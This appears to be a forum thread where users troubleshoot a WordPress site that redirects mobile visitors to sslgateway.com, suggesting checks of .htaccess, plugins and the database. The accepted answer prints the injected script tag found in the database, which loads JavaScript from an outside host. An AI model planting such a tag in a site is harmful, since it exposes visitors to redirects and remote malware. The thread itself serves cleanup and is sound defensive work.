# WordPress website redirecting to sslgateway.com

Tags: wordpress, malware, malware-detection

A WordPress website is getting redirected to sslgateway.com while browsing from mobile. I have downloaded all the files and searched for malicious code, but couldn't find anything. Does anyone have affected with this before?

Comment: check into `.htaccess` file, try to find from db

Comment: another solution. turn off all plugins, and check for redirect. if it exists, turn theme to WP default one

Comment: Search inside database also. It is possibile that some js is injected in databse.

Answer (score 0, accepted):

The DB was infected with a script which was causing the problem.

```
<script type=\'text/javascript\' src=\'https://con1.sometimesfree.biz/c.js\'></script>
```